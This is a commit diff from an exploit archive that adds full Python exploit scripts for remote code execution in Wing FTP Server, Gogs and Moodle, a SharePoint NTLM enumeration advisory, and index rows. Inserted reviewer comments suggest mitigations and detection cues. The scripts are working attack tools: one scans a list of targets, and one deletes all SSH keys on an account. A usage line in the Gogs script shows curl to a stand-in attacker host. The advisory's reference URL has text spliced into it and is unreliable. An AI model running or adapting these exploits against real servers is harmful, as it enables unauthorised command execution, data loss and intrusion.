DB: 2025-07-03

5 changes to exploits/shellcodes/ghdb

gogs 0.13.0 - Remote Code Execution (RCE)

Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution  (RCE)

Moodle 4.4.0 - Authenticated Remote Code Execution

Microsoft SharePoint 2019 - NTLM Authentication
Exploit-DB 2025-07-03 00:16:29 +00:00
parent 97a1ee1350
commit 83f6bce1ba
5 changed files with 696 additions and 0 deletions

179
exploits/multiple/remote/52347.py Executable file

@ -0,0 +1,179 @@
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'
# parameter during login, leading to Lua code injection into session files. These maliciously crafted
# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed,
# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows).
# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL)
# and the session creation logic (which uses the full unsanitized username).
# Proof-of-Concept (Python):
# The provided Python script automates the exploitation process.
# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html.
# Upon successful authentication (even anonymous), a UID cookie is returned.
# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code,
# leading to RCE.
import requests
import re
import argparse
# ANSI color codes
RED = "\033[91m"
GREEN = "\033[92m"
RESET = "\033[0m"
def print_green(text):
print(f"{GREEN}{text}{RESET}")
def print_red(text):
print(f"{RED}{text}{RESET}")
def run_exploit(target_url, command, username="anonymous", verbose=False):
login_url = f"{target_url}/loginok.html"
login_headers = {
"Host": target_url.split('//')[1].split('/')[0],
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": target_url,
"Connection": "keep-alive",
"Referer": f"{target_url}/login.html?lang=english",
"Cookie": "client_lang=english",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=0, i"
}
from urllib.parse import quote
encoded_username = quote(username)
payload = (
f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")"
"%0dh%3aclose()%0dprint(r)%0d--&password="
)
if verbose:
print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'")
try:
login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10)
login_response.raise_for_status()
except requests.exceptions.RequestException as e:
print_red(f"[-] Error sending POST request to {login_url}: {e}")
return False
set_cookie = login_response.headers.get("Set-Cookie", "")
match = re.search(r'UID=([^;]+)', set_cookie)
if not match:
print_red("[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.")
return False
uid = match.group(1)
if verbose:
print_green(f"[+] UID extracted: {uid}")
dir_url = f"{target_url}/dir.html"
dir_headers = {
"Host": login_headers["Host"],
"User-Agent": login_headers["User-Agent"],
"Accept": login_headers["Accept"],
"Accept-Language": login_headers["Accept-Language"],
"Accept-Encoding": login_headers["Accept-Encoding"],
"Connection": "keep-alive",
"Cookie": f"UID={uid}",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=0, i"
}
if verbose:
print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}")
try:
dir_response = requests.get(dir_url, headers=dir_headers, timeout=10)
dir_response.raise_for_status()
except requests.exceptions.RequestException as e:
print_red(f"[-] Error sending GET request to {dir_url}: {e}")
return False
body = dir_response.text
clean_output = re.split(r'<\?xml', body)[0].strip()
if verbose:
print_green("\n--- Command Output ---")
print(clean_output)
print_green("----------------------")
else:
if clean_output:
print_green(f"[+] {target_url} is vulnerable!")
else:
print_red(f"[-] {target_url} is NOT vulnerable.")
return bool(clean_output)
def main():
parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.")
parser.add_argument("-u", "--url", type=str,
help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.")
parser.add_argument("-f", "--file", type=str,
help="File containing list of target URLs (one per line).")
parser.add_argument("-c", "--command", type=str,
help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.")
parser.add_argument("-o", "--output", type=str,
help="File to save vulnerable URLs.")
parser.add_argument("-U", "--username", type=str, default="anonymous",
help="Username to use in the exploit payload. Default: anonymous")
args = parser.parse_args()
if not args.url and not args.file:
parser.error("Either -u/--url or -f/--file must be specified.")
command_to_use = args.command if args.command else "whoami"
verbose_mode = True if args.command else args.verbose
vulnerable_sites = []
targets = []
if args.file:
try:
with open(args.file, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
except Exception as e:
print_red(f"[-] Could not read target file '{args.file}': {e}")
return
else:
targets = [args.url]
for target in targets:
print(f"\n[*] Testing target: {target}")
is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode)
if is_vulnerable:
vulnerable_sites.append(target)
if args.output and vulnerable_sites:
try:
with open(args.output, 'w') as out_file:
for site in vulnerable_sites:
out_file.write(site + "\n")
print_green(f"\n[+] Vulnerable sites saved to: {args.output}")
except Exception as e:
print_red(f"[-] Could not write to output file '{args.output}': {e}")
if __name__ == "__main__":
main()
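Review bot: The header comment explains the NULL-byte flaw in detail but gives a defender nothing to act on, even though the facts are already in it: it says versions prior to 7.4.4 are affected and that the injected Lua reaches session files through a POST to loginok.html. I would add two comment lines after the description, `# Mitigation: upgrade to Wing FTP Server 7.4.4 or later.` and `# Detection: login POSTs to /loginok.html whose username contains %00; session files containing io.popen.`. The `-f`/`--file` help text should also say that the default mode is not a passive check: `run_exploit` always submits a command (`whoami` unless `-c` is given), so every host listed is presumably left with a modified session file.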

194
exploits/multiple/remote/52348.py Executable file

@ -0,0 +1,194 @@
# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE)
# Date: 27th June, 2025
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/gogs/gogs.git
# Version: gogs <=0.13.0
# Tested on: Ubuntu
# CVE: CVE-2024-39930
# ===============================
# Example Usage:
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned"
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222
# ===============================
import requests
import paramiko
import base64
import random
import string
import sys
import argparse
from urllib.parse import urlparse
API_BASE_URL = ""
def generate_random_string(length=8, charset=None):
if charset is None:
charset = string.ascii_letters + string.digits
return ''.join(random.choices(charset, k=length))
def make_headers(token=None, basic_auth=None):
headers = {"Content-Type": "application/json"}
if token:
headers["Authorization"] = f"token {token}"
elif basic_auth:
b64 = base64.b64encode(basic_auth.encode()).decode()
headers["Authorization"] = f"Basic {b64}"
return headers
def http_post(path, json=None, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.post(url, json=json, headers=headers)
response.raise_for_status()
return response
def http_get(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.get(url, headers=headers)
response.raise_for_status()
return response
def http_delete(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.delete(url, headers=headers)
response.raise_for_status()
return response
def obtain_api_token(username, password):
auth = f"{username}:{password}"
headers = make_headers(basic_auth=auth)
data = {"name": generate_random_string()}
try:
response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
token = response.json()['sha1']
print(f"[+] API Token Acquired: {token}")
return token
except Exception as e:
print(f"[!] Failed to obtain API token: {e}")
sys.exit(1)
def create_repo(token):
repo_name = generate_random_string()
headers = make_headers(token=token)
data = {
"name": repo_name,
"description": "Auto-created repository",
"private": False
}
try:
response = http_post("/user/repos", json=data, headers=headers)
full_name = response.json()['full_name']
print(f"[+] Repository Created: {full_name}")
return full_name
except Exception as e:
print(f"[!] Failed to create repository: {e}")
sys.exit(1)
def delete_existing_ssh_keys(token):
headers = make_headers(token=token)
try:
response = http_get("/user/keys", headers=headers)
keys = response.json()
for key in keys:
key_id = key['id']
http_delete(f"/user/keys/{key_id}", headers=headers)
print(f"[+] Deleted SSH Key ID: {key_id}")
except Exception as e:
print(f"[!] Failed to delete existing SSH keys: {e}")
sys.exit(1)
def add_ssh_key(public_key_path, token):
delete_existing_ssh_keys(token)
try:
with open(public_key_path, 'r') as f:
key = f.read()
except Exception as e:
print(f"[!] Failed to read public key file: {e}")
sys.exit(1)
headers = make_headers(token=token)
data = {
"title": generate_random_string(),
"key": key
}
try:
response = http_post("/user/keys", json=data, headers=headers)
print(f"[+] SSH Key Added: {response.status_code}")
except Exception as e:
print(f"[!] Failed to add SSH key: {e}")
sys.exit(1)
def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):
try:
key = paramiko.RSAKey.from_private_key_file(private_key_path)
except Exception as e:
print(f"[!] Failed to load SSH key: {e}")
sys.exit(1)
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)
session = client.get_transport().open_session()
print("[+] Executing command...... ")
session.set_environment_variable("--split-string", command)
session.exec_command(f"git-upload-pack {repo_path}")
stdout = session.makefile('rb', 1024)
stderr = session.makefile_stderr('rb', 1024)
print("STDERR:", stderr.read().decode())
print("STDOUT:", stdout.read().decode())
session.close()
client.close()
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
def main():
global API_BASE_URL
parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
parser.add_argument("auth", help="Gogs credentials in the format username:password")
parser.add_argument("private_key", help="Path to private SSH key")
parser.add_argument("public_key", help="Path to public SSH key")
parser.add_argument("command", help="Command to execute remotely")
parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
args = parser.parse_args()
parsed_url = urlparse(args.url)
API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
ssh_host = parsed_url.hostname
ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)
try:
username, password = args.auth.split(":")
except ValueError:
print("[!] Invalid format for auth argument")
sys.exit(1)
token = obtain_api_token(username, password)
repo_path = create_repo(token)
add_ssh_key(args.public_key, token)
exploit(
ssh_user=username,
ssh_host=ssh_host,
ssh_port=ssh_port,
private_key_path=args.private_key,
repo_path=repo_path,
command=args.command
)
if __name__ == "__main__":
main()
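Review bot: `add_ssh_key` calls `delete_existing_ssh_keys` first, which removes every SSH key registered on the account and never restores them, and nothing in the usage header says so. The run also leaves a new API token, a public repository with the description "Auto-created repository" and the uploaded key on the server, none of which is cleaned up; those same artefacts are what an administrator reviewing a Gogs instance for CVE-2024-39930 activity can look for. I would document this in the header, for example `# Side effects: deletes all SSH keys of the account; creates an API token, a public repo and a new key that are not removed.` Separately, `obtain_api_token` prints the token in full and `exploit` uses `paramiko.AutoAddPolicy()`, so the token ends up in terminal logs and the SSH host key is accepted without verification.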


@ -0,0 +1,262 @@
# Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution
# Exploit Author: Likhith Appalaneni
# Vendor Homepage: https://moodle.org
# Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0
# Tested Version: Moodle 4.4.0
# Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11
# Tested On: Ubuntu 22.04, Apache2, PHP 8.2
# CVE: CVE-2024-43425
# References:
# - https://github.com/aninfosec/CVE-2024-43425-Poc
# - https://nvd.nist.gov/vuln/detail/CVE-2024-43425
import argparse
import requests
import re
import sys
import subprocess
from bs4 import BeautifulSoup
import urllib.parse
requests.packages.urllib3.disable_warnings()
def get_login_token(session, login_url):
print("[*] Step 1: GET /login/index.php to extract login token")
try:
response = session.get(login_url, verify=False)
if response.status_code != 200:
print(f"[-] Unexpected status code {response.status_code} when accessing login page")
sys.exit(1)
except Exception as e:
print(f"[-] Error connecting to {login_url}: {e}")
sys.exit(1)
soup = BeautifulSoup(response.text, "html.parser")
token_input = soup.find("input", {"name": "logintoken"})
if not token_input or not token_input.get("value"):
print("[-] Failed to extract login token from HTML")
sys.exit(1)
token = token_input["value"]
print(f"[+] Found login token: {token}")
return token
def perform_login(session, login_url, username, password, token):
print("[*] Step 2: POST /login/index.php with credentials")
login_payload = {
"anchor": "",
"logintoken": token,
"username": username,
"password": password,
}
try:
response = session.post(
login_url,
data=login_payload,
headers={"Content-Type": "application/x-www-form-urlencoded"},
verify=False,
)
if response.status_code not in [200, 303]:
print(f"[-] Unexpected response code during login: {response.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] Login POST failed: {e}")
sys.exit(1)
if "MoodleSession" not in session.cookies.get_dict():
print("[-] Login may have failed: MoodleSession cookie missing")
sys.exit(1)
print("[+] Logged in successfully.")
def get_quiz_info(session, base_url, cmid):
print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...")
quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}"
try:
resp = session.get(quiz_edit_url, verify=False)
if resp.status_code != 200:
print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}")
sys.exit(1)
# Extract sesskey
sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text)
# Extract courseContextId
ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text)
# Extract category
category_match = re.search(r';category=(\d+)', resp.text)
if not (sesskey_match and ctxid_match and category_match):
print("[-] Could not extract sesskey, courseContextId, or category")
print(resp.text[:1000])
sys.exit(1)
sesskey = sesskey_match.group(1)
ctxid = ctxid_match.group(1)
category = category_match.group(1)
print(f"[+] Found sesskey: {sesskey}")
print(f"[+] Found courseContextId: {ctxid}")
print(f"[+] Found category: {category}")
return sesskey, ctxid, category
except Exception as e:
print(f"[-] Exception while extracting quiz info: {e}")
sys.exit(1)
def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid):
print("[*] Step 3: Uploading calculated question with payload...")
url = f"{base_url}/question/bank/editquestion/question.php"
payload = "(1)->{system($_GET[chr(97)])}"
post_data = {
"initialcategory": 1,
"reload": 1,
"shuffleanswers": 1,
"answernumbering": "abc",
"mform_isexpanded_id_answerhdr": 1,
"noanswers": 1,
"nounits": 1,
"numhints": 2,
"synchronize": "",
"wizard": "datasetdefinitions",
"id": "",
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"qtype": "calculated",
"makecopy": 0,
"sesskey": sesskey,
"_qf__qtype_calculated_edit_form": 1,
"mform_isexpanded_id_generalheader": 1,
"category": f"{category},{ctxid}",
"name": "exploit",
"questiontext[text]": "<p>test</p>",
"questiontext[format]": 1,
"questiontext[itemid]": 623548580,
"status": "ready",
"defaultmark": 1,
"generalfeedback[text]": "",
"generalfeedback[format]": 1,
"generalfeedback[itemid]": 21978947,
"answer[0]": payload,
"fraction[0]": 1.0,
"tolerance[0]": 0.01,
"tolerancetype[0]": 1,
"correctanswerlength[0]": 2,
"correctanswerformat[0]": 1,
"feedback[0][text]": "",
"feedback[0][format]": 1,
"feedback[0][itemid]": 281384971,
"unitrole": 3,
"penalty": 0.3333333,
"hint[0][text]": "",
"hint[0][format]": 1,
"hint[0][itemid]": 812786292,
"hint[1][text]": "",
"hint[1][format]": 1,
"hint[1][itemid]": 795720000,
"tags": "_qf__force_multiselect_submission",
"submitbutton": "Save changes"
}
try:
res = session.post(url, data=post_data, verify=False, allow_redirects=False)
if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]:
print("[+] Question upload request sent. Extracting question ID from redirect.")
qid = re.search(r"&id=(\d+)", res.headers["Location"])
if not qid:
print("[-] Could not extract question ID from redirect.")
sys.exit(1)
return qid.group(1)
else:
print(f"[-] Upload failed. Status code: {res.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] Upload exception: {e}")
sys.exit(1)
def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid):
print("[*] Step 4: Completing dataset wizard with dataset[0]=0")
wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions"
data_payload = {
"id": question_id,
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"category": f"{category},{ctxid}",
"wizard": "datasetitems",
"sesskey": sesskey,
"_qf__question_dataset_dependent_definitions_form": 1,
"dataset[0]": 0,
"synchronize": 0,
"submitbutton": "Next page"
}
try:
res = session.post(wizard_url, data=data_payload, verify=False)
if res.status_code == 200:
print("[+] Dataset wizard POST submitted.")
return False
elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text:
print("[+] Reached expected error page. Payload is being interpreted.")
return True
else:
print(f"[-] Dataset wizard POST failed with status: {res.status_code}")
return False
except Exception as e:
print(f"[-] Exception during dataset wizard step: {e}")
return False
def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd):
print("[*] Step 5: Triggering command: {cmd}")
encoded = urllib.parse.quote(cmd)
trigger_url = (
f"{base_url}/question/bank/editquestion/question.php?id={question_id}"
f"&category={category}&cmid={cmid}&courseid={courseid}"
f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0"
f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}"
)
try:
resp = session.get(trigger_url, verify=False)
print("[+] Trigger request sent. Output below:\n")
lines = resp.text.splitlines()
output_lines = []
for line in lines:
if "<html" in line.lower():
break
if line.strip():
output_lines.append(line.strip())
print("[+] Command output (top lines):")
print("\n".join(output_lines[:2]) if output_lines else "[!] No output detected.")
except Exception as e:
print(f"[-] Error triggering command: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Moodle CVE-2024-43425 Exploit")
parser.add_argument("--url", required=True, help="Target Moodle base URL")
parser.add_argument("--username", required=True, help="Moodle username")
parser.add_argument("--password", required=True, help="Moodle password")
parser.add_argument("--courseid", required=True, help="Course ID")
parser.add_argument("--cmid", required=True, help="Course Module ID (Quiz)")
parser.add_argument("--cmd", required=True, help="Command to execute remotely (e.g., 'whoami' or 'cat /flag')")
args = parser.parse_args()
session = requests.Session()
login_url = f"{args.url.rstrip('/')}/login/index.php"
token = get_login_token(session, login_url)
perform_login(session, login_url, args.username, args.password, token)
sesskey, ctxid, category = get_quiz_info(session, args.url.rstrip('/'), args.cmid)
question_id = upload_calculated_question(session, args.url.rstrip('/'), sesskey, args.cmid, args.courseid, category, ctxid)
if not post_dataset_wizard(session, args.url.rstrip('/'), question_id, sesskey, args.cmid, args.courseid, category, ctxid):
sys.exit(1)
trigger_rce(session, args.url.rstrip('/'), question_id, category, args.cmid, args.courseid, args.cmd)
if __name__ == "__main__":
main()
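Review bot: Every request passes `verify=False`, including the login POST in `perform_login` that carries the username and password, and `requests.packages.urllib3.disable_warnings()` at module level hides the resulting warning, so the credentials go out over an unauthenticated TLS channel with no indication. I would make that opt-in: `parser.add_argument("--insecure", action="store_true")`, then `session.verify = not args.insecure` in `main`, and drop the per-call `verify=False` arguments. The script also never removes what it creates: the calculated question named "exploit" whose `answer[0]` holds the payload stays in the question bank, which should be stated in the header and is the record an administrator can search for on the affected versions the header lists. Minor: the Step 5 message in `trigger_rce` is missing its `f` prefix and prints `{cmd}` literally.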


@ -0,0 +1,57 @@
# Titles: Microsoft SharePoint 2019 NTLM Authentication
# Author: nu11secur1ty
# Date: 06/27/25
# Vendor: Microsoft
# Software: https://www.microsoft.com/en-us/download/details.aspx?id=57462
# Reference:
https://www.networkdatapedia.com/post/ntlm-autSharePoint 2019 NTLM Authentication hentication-security-risks-and-how-to-avoid-them-gilad-david-maayan
## Description:
Microsoft SharePoint Central Administration improperly exposes
NTLM-authenticated endpoints to low-privileged or even brute-forced domain
accounts. Once authenticated, an attacker can access the `_api/web`
endpoint, disclosing rich metadata about the SharePoint site, including
user group relationships, workflow configurations, and file system
structures. The vulnerability enables username and password enumeration,
internal structure mapping, and API abuse.
Key issues include:
- NTLM over HTTP (unencrypted)
- No fine-grained access control on `_api/web`
- NTLM error codes act as oracles for credential validation
STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit:
```
# NTLM Authentication + SharePoint Enumeration Tool Usage:
python ntml.py -u http://10.10.0.15:10626 -U 'CORP\spfarm' -P 'p@ssw0rd'
-v
# Success output (highlight):
[+] NTLM Authentication succeeded on http://10.10.0.15:10626/_api/web
# Result: Full SharePoint metadata dump from the Central Admin instance
```
# Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47166/PoC)
# Time spent:
72:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
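Review bot: The URL under `# Reference:` has the words "SharePoint 2019 NTLM Authentication" spliced into the middle of its path (between `ntlm-aut` and `hentication-security-risks`), so the link does not resolve as written and should be restored to one unbroken URL. The advisory body never names the CVE; it appears only in the path of the Reproduce link, so a header line `# CVE: CVE-2025-47166` would make the file searchable. The three "Key issues" also imply the defensive steps, which the text could state outright: serve Central Administration over HTTPS only, restrict who can reach it, and monitor repeated NTLM failures against it. The script name `ntml.py` in the usage line looks like a transposition of `ntlm`, though that cannot be confirmed from this file.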


@ -10988,6 +10988,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",remote,multiple,,2002-02-19,2012-09-12,1,CVE-2002-0300;OSVDB-5323,,,,,https://www.securityfocus.com/bid/4125/info
47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,,2019-09-30,2019-09-30,0,CVE-2019-16645,,,,,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,,2018-01-24,2018-01-25,1,CVE-2017-17562,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/aae77fc1a47149d43747ad9513e6f778553ab82c/modules/exploits/linux/http/goahead_ldpreload.rb
52348,exploits/multiple/remote/52348.py,"gogs 0.13.0 - Remote Code Execution (RCE)",2025-07-02,cybersploit,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2024-39930,,,,,
33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,multiple,,2009-06-03,2014-04-28,1,CVE-2009-2352;OSVDB-56478,,,,,https://www.securityfocus.com/bid/35572/info
33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35839/info
33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35841/info
@ -11686,6 +11687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,,2004-12-14,2016-04-19,1,,,,,http://www.exploit-db.comwget-1.9.tar.gz,
31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",remote,multiple,,2008-02-04,2014-01-28,1,CVE-2008-5159;OSVDB-42861,,,,,https://www.securityfocus.com/bid/27614/info
33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",remote,multiple,,2009-06-08,2014-05-01,1,CVE-2009-2386;OSVDB-55863,,,,,https://www.securityfocus.com/bid/35595/info
52347,exploits/multiple/remote/52347.py,"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)",2025-07-02,4m3rr0r,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2025-47812,,,,,
16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,remote,multiple,,2010-11-24,2011-07-15,1,CVE-2010-0304;OSVDB-61987,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.2.0.zip,
31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple,,2008-06-20,2014-02-27,1,CVE-2008-2889;OSVDB-46537,,,,,https://www.securityfocus.com/bid/29844/info
19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info
@ -12199,6 +12201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,,
49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,,
52350,exploits/multiple/webapps/52350.py,"Moodle 4.4.0 - Authenticated Remote Code Execution",2025-07-02,"Likhith Appalaneni",webapps,multiple,,2025-07-02,2025-07-02,0,CVE-2024-43425,,,,,
51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,,
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,,
9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,,
@ -44572,6 +44575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,,
16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,,2020-02-11,2020-02-11,0,CVE-2019-0604,,,,,
52349,exploits/windows/remote/52349.txt,"Microsoft SharePoint 2019 - NTLM Authentication",2025-07-02,nu11secur1ty,remote,windows,,2025-07-02,2025-07-02,0,CVE-2025-47166,,,,,
31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,remote,windows,,2008-04-09,2014-02-13,1,CVE-2008-1888;OSVDB-44459,,,,,https://www.securityfocus.com/bid/28706/info
29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows,,2007-05-04,2013-12-01,1,CVE-2007-2581,,,,,https://www.securityfocus.com/bid/23832/info
20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,remote,windows,,1999-01-30,2012-08-07,1,CVE-1999-0360;OSVDB-5884,,,,,https://www.securityfocus.com/bid/1811/info
